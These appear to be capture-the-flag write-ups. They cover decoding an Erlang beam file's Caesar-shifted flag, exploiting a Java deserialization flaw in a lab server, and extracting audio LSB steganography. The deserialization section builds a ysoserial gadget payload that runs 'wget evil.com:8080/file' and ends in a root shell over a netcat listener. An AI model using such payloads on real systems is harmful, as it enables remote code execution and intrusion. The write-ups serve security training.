- 1> io:format("~p~n",[beam_disasm:file("hackme.beam")]).
- {beam_file,hackme,
- [{module_info,0,4},{module_info,1,6},{start,0,2}],
- [{vsn,[284277428168876805194481449229875660789]}],
- [{options,[]},
- {version,"6.0"},
- {time,{2016,2,24,14,33,49}},
- {source,"/tmp/Untitled Folder/hackme.erl"}],
- [{function,start,0,2,
- [{label,1},
- {line,1},
- {func_info,{atom,hackme},{atom,start},0},
- {label,2},
- {allocate,0,0},
- {move,{literal,"'"},{x,1}},
- {move,{literal,"MuMuMuLoxkOtZnkNurk"},{x,0}},
- {line,2},
- {call_ext,2,{extfunc,string,concat,2}},
- {move,{literal,["Dpohsbut nbo! Aqw hkiwtgf qwv krz wr ehdw ivperk fieq jmpiw. Mjwj nx ymj kqfl: "]},
- {x,1}},
- {move,{literal,"Lets beat erlang files!~n~p"},{x,0}},
- {line,3},
- {call_ext_last,2,{extfunc,io,format,2},0}]},
- {function,module_info,0,4,
- [{line,0},
- {label,3},
- {func_info,{atom,hackme},{atom,module_info},0},
- {label,4},
- {move,{atom,hackme},{x,0}},
- {line,0},
- {call_ext_only,1,{extfunc,erlang,get_module_info,1}}]},
- {function,module_info,1,6,
- [{line,0},
- {label,5},
- {func_info,{atom,hackme},{atom,module_info},1},
- {label,6},
- {move,{x,0},{x,1}},
- {move,{atom,hackme},{x,0}},
- {line,0},
- {call_ext_only,2,
- {extfunc,erlang,get_module_info,2}}]}]}
- ok
- 2>
- Encrypted: Aqw hkiwtgf qwv krz wr ehdw ivperk fieq jmpiw. Mjwj nx ymj kqfl: MuMuMuLoxkOtZnkNurk
- Decrypted: You figured out how to beat erlang beam files. Here is the flag: GoGoGoFireInTheHole
- (A Caesar shift that grows through the text: 1 for "Dpohsbut nbo!", 2 for "Aqw hkiwtgf qwv", 3 for "krz wr ehdw", 4 for "ivperk fieq jmpiw.", 5 for "Mjwj nx ymj kqfl:", 6 for the flag.)
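Pulling the string literals out of the beam_disasm dump and undoing the per-word Caesar shift, as an added example that is not the writeup's tooling. The dump excerpt is the one printed above; the shift schedule is the one read off the decrypted text (1 for the greeting, 2 to 5 across the sentence, 6 for the flag), and `shift_for()` shows how a single cribbed word ("Here", "You") pins each shift down.

```python
"""Added example: string literals from a beam_disasm listing and a per-word Caesar
decoder with a shift schedule (not the writeup's code)."""
import re

# Constructed input: the literal-bearing lines of the beam_disasm output above.
DUMP = r"""
{move,{literal,"'"},{x,1}},
{move,{literal,"MuMuMuLoxkOtZnkNurk"},{x,0}},
{move,{literal,["Dpohsbut nbo! Aqw hkiwtgf qwv krz wr ehdw ivperk fieq jmpiw. Mjwj nx ymj kqfl: "]},
{move,{literal,"Lets beat erlang files!~n~p"},{x,0}},
"""

LITERAL_RE = re.compile(r'\{literal,\[?"((?:[^"\\]|\\.)*)"\]?\}')


def beam_string_literals(dump):
    """Every "..." literal in a beam_disasm listing, in order of appearance."""
    return LITERAL_RE.findall(dump)


def caesar(text, shift):
    """Shift letters by `shift` (negative to decrypt), leaving punctuation alone."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def shift_for(cipher_word, plain_word):
    """Crib on one word: the shift that maps plain_word onto cipher_word, or None."""
    for s in range(26):
        if caesar(plain_word, s) == cipher_word:
            return s
    return None


def decrypt_with_schedule(text, schedule):
    """One Caesar shift per whitespace-separated word; the last shift repeats if the
    schedule is shorter than the text."""
    words = text.split(" ")
    return " ".join(caesar(w, -schedule[min(i, len(schedule) - 1)]) for i, w in enumerate(words))


# Shifts per word of the long literal, as observed in the writeup's plaintext.
SCHEDULE = [1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4, 5, 5, 5, 5]


if __name__ == "__main__":
    lits = beam_string_literals(DUMP)
    print(lits)
    print(shift_for("Mjwj", "Here"))                   # 5
    print(decrypt_with_schedule(lits[2], SCHEDULE))
    print(caesar(lits[1], -6))                         # GoGoGoFireInTheHole
```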
- 7685 Why so serious ------------:
- Login:
- URL loginUrl = new URL(AcmeClient.getServerUrl() + "/login");
- String urlParameters = String.format("username=%s&password=%s", new Object[] { username, password });
- byte[] postData = urlParameters.getBytes(StandardCharsets.UTF_8);
- int postDataLength = postData.length;
- HttpURLConnection conn = (HttpURLConnection)loginUrl.openConnection();
- conn.setRequestMethod("POST");
- conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
- conn.setRequestProperty("Content-Length", Integer.toString(postData.length));
- conn.setRequestProperty("charset", "utf-8");
- conn.setUseCaches(false);
- conn.setInstanceFollowRedirects(false);
- conn.setDoOutput(true);
- DataOutputStream wr = new DataOutputStream(conn.getOutputStream());
- wr.write(postData);
- POST /acme-server//login HTTP/1.1
- Content-Type: application/x-www-form-urlencoded
- charset: utf-8
- Cache-Control: no-cache
- Pragma: no-cache
- User-Agent: Java/1.8.0_65
- Host: 6f00328f7dc4.i.hacking-lab.com
- Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
- Connection: keep-alive
- Content-Length: 32
- username=johndoe&password=123456
- Response:
- HTTP/1.1 200 OK
- Server: Apache-Coyote/1.1
- Content-Type: text/xml;charset=ISO-8859-1
- Content-Length: 270
- Date: Fri, 01 Jul 2016 13:52:21 GMT
- <?xml version="1.0"?>
- <access-control>
- <right id="11">false</right>
- <right id="134">true</right>
- <right id="13">true</right>
- <right id="291">true</right>
- <right id="1024">false</right>
- <right id="987">false</right>
- <right id="1337">true</right>
- </access-control>
- private void jButton1ActionPerformed(ActionEvent evt)
- {
- RecordBean record = new RecordBean();
- record.setLastName(this.fieldLastName.getText());
- record.setFirstName(this.fieldFirstName.getText());
- record.setGender(this.fieldGender.getModel().getSelectedItem().toString());
- record.setEmail(this.fieldEmail.getText());
- try
- {
- URL url = new URL(AcmeClient.getServerUrl() + "/adddata");
- HttpURLConnection conn = (HttpURLConnection)url.openConnection();
- conn.setDoOutput(true);
- ObjectOutputStream oos = new ObjectOutputStream(conn.getOutputStream());
- oos.writeObject(record);
- oos.flush();
- oos.close();
- conn.getResponseCode();
- }
- catch (Exception e)
- {
- throw new RuntimeException(e);
- }
- }
- }
- POST /acme-server/adddata HTTP/1.1
- ...
- Response:
- ...
- <b>exception</b></p><pre>java.io.StreamCorruptedException: invalid stream header: 75736572
- java.io.ObjectInputStream.readStreamHeader(ObjectInputStream.java:804)
- java.io.ObjectInputStream.<init>(ObjectInputStream.java:299)
- com.acme.server.AddDataServlet.processRequest(AddDataServlet.java:36)
- com.acme.server.AddDataServlet.doPost(AddDataServlet.java:71)
- javax.servlet.http.HttpServlet.service(HttpServlet.java:648)
- javax.servlet.http.HttpServlet.service(HttpServlet.java:729)
- org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
- -> AddDataServlet wraps the raw POST body in an ObjectInputStream and calls readObject() on it; the rejected header 75736572 is just the ASCII "user" of the form-encoded body. Any serialized Java object is therefore deserialized without a filter, so a ysoserial gadget chain is, too:
- $ java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections5 'wget evil.com:8080/file -O /tmp/xxx' > stream.bin
- POST /acme-server/adddata HTTP/1.1
- Content-Type: application/x-www-form-urlencoded
- charset: utf-8
- Cache-Control: no-cache
- Pragma: no-cache
- User-Agent: Java/1.8.0_65
- Host: b01ed7e7b10b.i.hacking-lab.com
- Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
- Connection: keep-alive
- Content-Length: 2078
- <payload from stream.bin>
- $ nc -vlp 8080
- listening on [any] 8080 ...
- Warning: forward host lookup failed for host-246-102.compass-security.com:
- connect to [91.214.168.38] from host-246-102.compass-security.com [212.254.246.102] 42497
- id
- uid=0(root) gid=0(root) groups=0(root)
- ls -la
- total 124
- drwxr-sr-x. 10 root staff 4096 Jul 1 12:50 .
- drwxrwsr-x. 11 root staff 4096 Mar 15 22:15 ..
- -rw-r--r--. 1 root root 57011 Feb 2 19:39 LICENSE
- -rw-r--r--. 1 root root 1444 Feb 2 19:39 NOTICE
- -rw-r--r--. 1 root root 6741 Feb 2 19:39 RELEASE-NOTES
- -rw-r--r--. 1 root root 16195 Feb 2 19:39 RUNNING.txt
- drwxr-xr-x. 2 root root 4096 Mar 15 22:15 bin
- drwxr-xr-x. 3 root root 4096 Jul 1 12:50 conf
- drwxr-sr-x. 2 root staff 4096 Jul 1 12:50 dummy
- drwxr-xr-x. 2 root root 4096 Mar 15 22:15 lib
- drwxr-xr-x. 2 root root 4096 Jul 1 12:50 logs
- drwxr-xr-x. 2 root root 4096 Mar 15 22:15 temp
- drwxr-xr-x. 8 root root 4096 Jul 1 12:50 webapps
- drwxr-xr-x. 3 root root 4096 Jul 1 12:50 work
- cd /tmp
- ls
- goldnugget
- hsperfdata_root
- xxx
- cat goldnugget
- ZAhgt^L&NgTUWDwv577fY*A^G8y!EGUT
- 5076 Listen Carefully ------------:
- Alternate the LSBs of the left and right channel, frame by frame:
- #!/usr/bin/perl
- # Bit i of the hidden text is the LSB of left sample i for even i and of
- # right sample i for odd i.
- use strict;
- use warnings;
- use Audio::SndFile;
- my $f = Audio::SndFile->open("<", "audio_file.wav");
- my $buffer;
- $f->read_short($buffer, $f->frames);          # interleaved L/R 16-bit samples
- my @values = unpack("S*", $buffer);
- my (@left, @right);
- for my $i (0 .. $#values) {
-     if ($i % 2 == 0) { push @left, $values[$i] } else { push @right, $values[$i] }
- }
- my $str = '';
- for my $i (0 .. $#left) {
-     $str .= ($i % 2 == 0 ? $left[$i] : $right[$i]) & 1;
- }
- print substr pack('B*', $str), 0, 445;        # the first 445 bytes hold the text
- $ perl solve.pl
- Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
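The same extraction with the standard-library `wave` module, as an added example that is not the writeup's Perl, together with an embedder so the scheme can be exercised offline. Bit i is taken from the LSB of left sample i for even i and of right sample i for odd i, as in the Perl above. The carrier is constructed noise and the hidden text is a stand-in; the real audio_file.wav is not on the page.

```python
"""Added example: LSB steganography in 16-bit stereo WAV, alternating channels per
frame index (not the writeup's code; carrier and secret constructed)."""
import io
import random
import struct
import wave


def _read_stereo(wav_bytes):
    with wave.open(io.BytesIO(wav_bytes)) as w:
        assert w.getnchannels() == 2 and w.getsampwidth() == 2
        frames = w.getnframes()
        samples = struct.unpack(f"<{frames * 2}h", w.readframes(frames))
        return list(samples[0::2]), list(samples[1::2]), w.getframerate()


def _write_stereo(left, right, rate):
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(2)
        w.setsampwidth(2)
        w.setframerate(rate)
        interleaved = [v for pair in zip(left, right) for v in pair]
        w.writeframes(struct.pack(f"<{len(interleaved)}h", *interleaved))
    return buf.getvalue()


def make_carrier(frames, rate=8000, seed=1):
    """Constructed carrier: random 16-bit stereo noise."""
    rng = random.Random(seed)
    left = [rng.randint(-20000, 20000) for _ in range(frames)]
    right = [rng.randint(-20000, 20000) for _ in range(frames)]
    return _write_stereo(left, right, rate)


def embed(wav_bytes, message):
    """Write message bits into the LSBs, alternating left/right per frame index."""
    left, right, rate = _read_stereo(wav_bytes)
    bits = [int(b) for byte in message for b in f"{byte:08b}"]
    if len(bits) > len(left):
        raise ValueError("carrier too short")
    for i, bit in enumerate(bits):
        channel = left if i % 2 == 0 else right
        channel[i] = (channel[i] & ~1) | bit
    return _write_stereo(left, right, rate)


def extract(wav_bytes, nbytes):
    """Mirror of the Perl: collect LSBs, pack 8 per byte, return the first nbytes."""
    left, right, _ = _read_stereo(wav_bytes)
    bits = []
    for i in range(min(len(left), nbytes * 8)):
        sample = left[i] if i % 2 == 0 else right[i]
        bits.append(sample & 1)
    usable = len(bits) - len(bits) % 8
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, usable, 8))


if __name__ == "__main__":
    secret = b"Lorem ipsum dolor sit amet"      # constructed stand-in for the hidden text
    stego = embed(make_carrier(4000), secret)
    print(extract(stego, len(secret)))
```

Without knowing the channel alternation the extracted bytes look like noise, which is why the writeup tries a concrete bit order rather than plain left-channel LSBs; on real audio, a run of readable ASCII after `pack 'B*'` is the confirmation that the order is right.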